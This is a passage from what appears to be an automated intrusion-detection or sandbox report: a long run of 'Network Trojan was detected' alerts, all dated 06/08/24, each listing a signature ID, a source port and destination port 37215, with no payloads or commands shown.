          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242574
          SID:2835222
          Source Port:53746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787047
          SID:2835222
          Source Port:51374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512757
          SID:2829579
          Source Port:54616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705058
          SID:2835222
          Source Port:44088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704570
          SID:2829579
          Source Port:51096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404354
          SID:2835222
          Source Port:58238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263772
          SID:2835222
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896697
          SID:2835222
          Source Port:48842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787200
          SID:2835222
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165668
          SID:2829579
          Source Port:58694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159402
          SID:2829579
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807298
          SID:2835222
          Source Port:34252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881359
          SID:2835222
          Source Port:50444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911626
          SID:2835222
          Source Port:55020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554139
          SID:2829579
          Source Port:48020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512176
          SID:2829579
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240532
          SID:2829579
          Source Port:44310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160866
          SID:2835222
          Source Port:45946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739824
          SID:2835222
          Source Port:56900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822599
          SID:2829579
          Source Port:57588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731365
          SID:2835222
          Source Port:35506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.064426
          SID:2829579
          Source Port:34240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.831165
          SID:2835222
          Source Port:34106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081209
          SID:2835222
          Source Port:52352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511591
          SID:2835222
          Source Port:45060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813626
          SID:2835222
          Source Port:50276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355390
          SID:2835222
          Source Port:43846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276808
          SID:2835222
          Source Port:47594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741982
          SID:2829579
          Source Port:46322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471116
          SID:2835222
          Source Port:43606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180971
          SID:2829579
          Source Port:42390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075786
          SID:2835222
          Source Port:43518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820837
          SID:2835222
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892073
          SID:2835222
          Source Port:34094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241748
          SID:2835222
          Source Port:35988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895657
          SID:2829579
          Source Port:45246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742829
          SID:2835222
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446584
          SID:2829579
          Source Port:44578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157565
          SID:2835222
          Source Port:33084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542341
          SID:2829579
          Source Port:48106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017638
          SID:2835222
          Source Port:52938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262517
          SID:2835222
          Source Port:35862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744596
          SID:2835222
          Source Port:43142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161413
          SID:2829579
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272841
          SID:2829579
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160104
          SID:2829579
          Source Port:35020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407206
          SID:2829579
          Source Port:36464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449530
          SID:2835222
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799842
          SID:2835222
          Source Port:47518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462513
          SID:2835222
          Source Port:36184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132703
          SID:2829579
          Source Port:36810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154152
          SID:2829579
          Source Port:39042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456060
          SID:2829579
          Source Port:48714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600754
          SID:2829579
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734988
          SID:2835222
          Source Port:51566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017342
          SID:2835222
          Source Port:46374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405351
          SID:2829579
          Source Port:44490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175298
          SID:2835222
          Source Port:53850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099089
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805006
          SID:2835222
          Source Port:40938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895989
          SID:2829579
          Source Port:58104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037951
          SID:2829579
          Source Port:56574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267813
          SID:2829579
          Source Port:57198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741996
          SID:2829579
          Source Port:36458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601393
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044344
          SID:2829579
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241361
          SID:2835222
          Source Port:33156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729694
          SID:2829579
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406330
          SID:2835222
          Source Port:47246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178518
          SID:2829579
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014735
          SID:2829579
          Source Port:40598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462397
          SID:2829579
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.277026
          SID:2829579
          Source Port:40666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891663
          SID:2829579
          Source Port:42074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175497
          SID:2829579
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897472
          SID:2835222
          Source Port:35842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355874
          SID:2829579
          Source Port:45292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806164
          SID:2829579
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270856
          SID:2835222
          Source Port:54344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350986
          SID:2835222
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791678
          SID:2829579
          Source Port:52796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037229
          SID:2835222
          Source Port:54780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783527
          SID:2835222
          Source Port:55642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911663
          SID:2835222
          Source Port:45248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465180
          SID:2835222
          Source Port:43752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670623
          SID:2829579
          Source Port:47536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111863
          SID:2829579
          Source Port:44354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449970
          SID:2829579
          Source Port:35470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745857
          SID:2835222
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513829
          SID:2835222
          Source Port:60294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600224
          SID:2835222
          Source Port:36444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155800
          SID:2835222
          Source Port:54304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155364
          SID:2835222
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787824
          SID:2829579
          Source Port:53784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042630
          SID:2835222
          Source Port:38238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302874
          SID:2829579
          Source Port:46614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405459
          SID:2829579
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554381
          SID:2835222
          Source Port:48496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518070
          SID:2835222
          Source Port:60936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547185
          SID:2835222
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239370
          SID:2829579
          Source Port:49154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174473
          SID:2835222
          Source Port:36810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356014
          SID:2835222
          Source Port:48102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463159
          SID:2835222
          Source Port:56156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787757
          SID:2835222
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732005
          SID:2829579
          Source Port:33546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675209
          SID:2835222
          Source Port:39872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673549
          SID:2829579
          Source Port:43978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842382
          SID:2829579
          Source Port:50440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127542
          SID:2829579
          Source Port:43146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021853
          SID:2829579
          Source Port:52542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733213
          SID:2835222
          Source Port:43974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014940
          SID:2835222
          Source Port:58276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177780
          SID:2829579
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160343
          SID:2835222
          Source Port:48080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005789
          SID:2829579
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554537
          SID:2829579
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670304
          SID:2829579
          Source Port:47002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109178
          SID:2829579
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462555
          SID:2829579
          Source Port:37796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395697
          SID:2835222
          Source Port:40538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514191
          SID:2829579
          Source Port:46948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862255
          SID:2829579
          Source Port:45452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730034
          SID:2835222
          Source Port:55400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188169
          SID:2835222
          Source Port:58856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131245
          SID:2835222
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795726
          SID:2835222
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883863
          SID:2829579
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238035
          SID:2829579
          Source Port:36852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601021
          SID:2829579
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108964
          SID:2829579
          Source Port:36144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039475
          SID:2829579
          Source Port:36826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834234
          SID:2829579
          Source Port:37196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107959
          SID:2835222
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259683
          SID:2829579
          Source Port:40190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268598
          SID:2835222
          Source Port:39014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547442
          SID:2835222
          Source Port:60676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173900
          SID:2829579
          Source Port:45690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708770
          SID:2829579
          Source Port:38394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131996
          SID:2829579
          Source Port:44356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733355
          SID:2829579
          Source Port:37568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356521
          SID:2835222
          Source Port:36636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511056
          SID:2835222
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353127
          SID:2835222
          Source Port:47764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468768
          SID:2835222
          Source Port:44978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783551
          SID:2835222
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260877
          SID:2835222
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134261
          SID:2835222
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857206
          SID:2829579
          Source Port:55638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545717
          SID:2829579
          Source Port:50180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802410
          SID:2835222
          Source Port:55976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551911
          SID:2835222
          Source Port:50584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844413
          SID:2829579
          Source Port:34468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745102
          SID:2829579
          Source Port:37254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746287
          SID:2835222
          Source Port:44924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036244
          SID:2835222
          Source Port:56326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517113
          SID:2835222
          Source Port:58804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158364
          SID:2835222
          Source Port:36942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159007
          SID:2829579
          Source Port:41236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.603005
          SID:2835222
          Source Port:53826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409858
          SID:2835222
          Source Port:39860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743790
          SID:2835222
          Source Port:52120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264893
          SID:2829579
          Source Port:56548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600997
          SID:2829579
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797998
          SID:2829579
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059794
          SID:2829579
          Source Port:44614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238557
          SID:2835222
          Source Port:58210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601680
          SID:2835222
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161179
          SID:2829579
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554500
          SID:2835222
          Source Port:34618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160725
          SID:2829579
          Source Port:58634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160422
          SID:2835222
          Source Port:58140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744469
          SID:2835222
          Source Port:43074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857599
          SID:2835222
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469156
          SID:2835222
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545374
          SID:2829579
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176374
          SID:2835222
          Source Port:59232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238528
          SID:2829579
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843856
          SID:2829579
          Source Port:57798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896797
          SID:2835222
          Source Port:41508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168362
          SID:2829579
          Source Port:59024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267939
          SID:2829579
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780717
          SID:2829579
          Source Port:59110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601184
          SID:2835222
          Source Port:41218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067846
          SID:2835222
          Source Port:43830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734638
          SID:2829579
          Source Port:53146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174116
          SID:2835222
          Source Port:51440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465491
          SID:2835222
          Source Port:51392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514008
          SID:2829579
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152716
          SID:2835222
          Source Port:36866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832445
          SID:2835222
          Source Port:35990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2835222
          Source Port:43996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135569
          SID:2835222
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705084
          SID:2829579
          Source Port:37420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890571
          SID:2829579
          Source Port:47756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846292
          SID:2835222
          Source Port:54862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128160
          SID:2835222
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
